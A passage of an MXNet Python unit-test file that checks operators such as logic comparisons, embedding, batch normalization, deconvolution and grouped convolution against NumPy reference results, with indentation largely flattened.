exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out.asnumpy(), reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out.asnumpy(), reference(xa, dtype=xa.dtype))
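# Embedding forward equals one_hot(data) . weight, so its weight gradient on backward
# equals one_hot(data)^T . out_grad.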
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0].asnumpy(), data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    npout_grad = np.zeros(shape)  # the gradient of sign() is zero everywhere
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
    data1 = mx.symbol.Variable('data1')
    data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
    test = mx.sym.maximum(data1, data2) + mx.sym.minimum(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
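# Shape-inference-only check: the inferred Deconvolution output must be
# (batch, num_filter) + target_shape, where target_shape defaults to 8 per
# spatial dim when not given.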
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
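# UpSampling checks below feed the forward outputs back as out-grads and verify each
# input's gradient equals the input scaled by root_scale**2 * scale**(2*k).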
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='bilinear', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm_v1(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
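# Compare BatchNorm / SyncBatchNorm outputs, running statistics and gradients
# against a reference computed by hand with NDArray operations.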
@with_seed()
def test_batchnorm():
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(op, shape, axis, cudnn_off, output_mean_var):
print(str((op, shape, axis, cudnn_off)))
kwargs = dict(output_mean_var=output_mean_var)
if op == mx.nd.contrib.SyncBatchNorm:
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad()
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad()
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
for _ in range(num_iters):
data = mx.nd.random.uniform(shape=shape)
data.attach_grad()
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=False, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
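            # Reference backward pass: with nx = (x - mean) / sqrt(var + eps),
            # dW = sum(ograd * nx), db = sum(ograd), and dX follows the usual
            # batch-norm chain rule through the batch mean and variance.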
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
atol = 1e-2
rtol = 1e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(data.grad.asnumpy(),
dX.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_gamma.grad.asnumpy(), dW.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(
bn_beta.grad.asnumpy(), db.asnumpy(), atol=atol, rtol=rtol)
for op in [mx.nd.BatchNorm, mx.nd.contrib.SyncBatchNorm]:
for shape in [(24, 2), (24, 3, 4), (24, 4, 4, 4), (24, 5, 6, 4, 4)]:
for axis in range(len(shape)):
for cudnn_off in [False, True]:
for output_mean_var in [False, True]:
_test_batchnorm_impl(op, shape, axis,
cudnn_off, output_mean_var)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
